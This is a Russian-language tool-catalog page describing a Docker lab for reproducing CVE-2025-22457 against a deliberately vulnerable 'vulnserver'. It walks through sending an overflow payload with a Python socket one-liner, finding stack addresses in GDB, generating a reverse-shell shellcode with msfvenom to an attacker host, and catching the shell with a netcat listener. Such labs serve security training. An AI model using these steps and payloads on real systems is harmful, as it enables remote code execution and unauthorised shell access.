Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-22457-vulnserver-lab — Практическая лаборатория по воспроизведению CVE-2025-22457: разворачивает Docker-контейнеры атакующего и жертвы, находит адреса стека с помощью GDB и доставляет эксплойт с обратной оболочкой msfvenom. | Kitploit
Инструменты/GitHubGitHub/donofly/cve-2025-22457-vulnserver-lab
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодCTFТестирование на ПроникновениеОбучение и ОбразованиеЭксплуатация Бинарных ФайловЛаборатории и Практика
GitHubdonofly/cve-2025-22457-vulnserver-lab

CVE-2025-22457-vulnserver-lab

Практическая лаборатория по воспроизведению CVE-2025-22457: разворачивает Docker-контейнеры атакующего и жертвы, находит адреса стека с помощью GDB и доставляет эксплойт с обратной оболочкой msfvenom.

Репозиторий
11 день назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Шаг 1: настройка окружения

Права доступа и запуск скрипта

Если вы используете Windows, можно запустить через WSL

root@kitploit:~
chmod +x setup_environment.sh
./setup_environment.sh

Шаг 2: Поиск динамических значений (требует ручных действий)

Поскольку адреса памяти и IP-адреса динамически меняются в разных окружениях, их нужно найти вручную и обновить скрипт exploit.py.

2.0 Сначала запустите два контейнера attacker и один контейнер victim для дальнейшей подготовки

root@kitploit:~
docker exec -it atac /bin/bash
docker exec -it vic /bin/bash

2.1 Поиск stack_address (адреса возврата)

Цель этого шага — найти стабильный адрес стека, чтобы наш payload мог точно выполнить переход.

1. Запустите GDB в контейнере victim
root@kitploit:~
gdb ./vulnserver
2. Установите точку останова после функции strcpy
root@kitploit:~
(gdb) b strcpy
3. Запустите программу, vulnserver начнёт прослушивание
root@kitploit:~
(gdb) run

Срабатывание точки останова: используя контейнер attacker, выполните следующую команду, чтобы отправить тестовый payload. Это остановит GDB на точке останова. Примечание: замените <VICTIM_IP> на Victim IP, показанный в шаге 1.

root@kitploit:~
python3 -c 'import socket; s = socket.socket(); s.connect(("<VICTIM_IP>", 9999)); s.send(b"A"*516 + b"BBBB" + b"C"*300); s.close()'

Найдите и запишите адрес: вернитесь в окно терминала, где работает GDB — программа должна уже остановиться. Выполните следующую команду для проверки стека:

root@kitploit:~
(gdb) x/200wx $esp

В выводе найдите область, состоящую из 0x43434343 (представляющих 'C'). Выберите из середины этой области любой адрес (например, 0xffffd580) и скопируйте его. Это и есть stack_address.

2.2 Обновление exploit.py и генерация buf (Shellcode)

Обновление stack_address:

С помощью текстового редактора обновите stack_address в exploit.py на только что скопированный адрес

Генерация и обновление buf (Shellcode):

В оболочке контейнера attacker выполните команду msfvenom для генерации shellcode. Примечание: замените <ATTACKER_IP> на Attacker IP, показанный в шаге 1.

root@kitploit:~
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<ATTACKER_IP> LPORT=4444 -b '\x00' -f python

Скопируйте весь блок buf = b""... из вывода msfvenom и полностью замените им существующую переменную buf в файле exploit.py.

Шаг 3 : Выполнение атаки

Запуск слушателя: в окне оболочки одного из контейнеров attacker выполните следующую команду для запуска слушателя netcat.

root@kitploit:~
nc -lvnp 4444

Открытие соединения на victim:

Можно использовать следующие два метода Метод первый

root@kitploit:~
./vulnserver

Метод второй

root@kitploit:~
gdb ./vulnserver
gef➤  run

Запуск скрипта атаки: запустите обновлённый exploit.py в контейнере attacker. (Примечание: замените <victim_ip> на victim ip, показанный в шаге 1)

root@kitploit:~
python3 exploit.py <victim_ip>

Проверка результата: переключитесь обратно в окно, где работает слушатель netcat. Если всё прошло успешно, вы увидите установленное соединение и получите интерактивную оболочку. Можно ввести команды whoami, ls -la и т.д. для проверки.

Шаг 4 : Очистка окружения

Выход из GDB и контейнеров:
root@kitploit:~
Введите quit в GDB, затем введите exit в оболочке контейнера.

Можно выполнить следующие команды для остановки и очистки всех контейнеров и сетей.

root@kitploit:~
docker stop vic atac
docker network rm 111550082_net
Скачать инструмент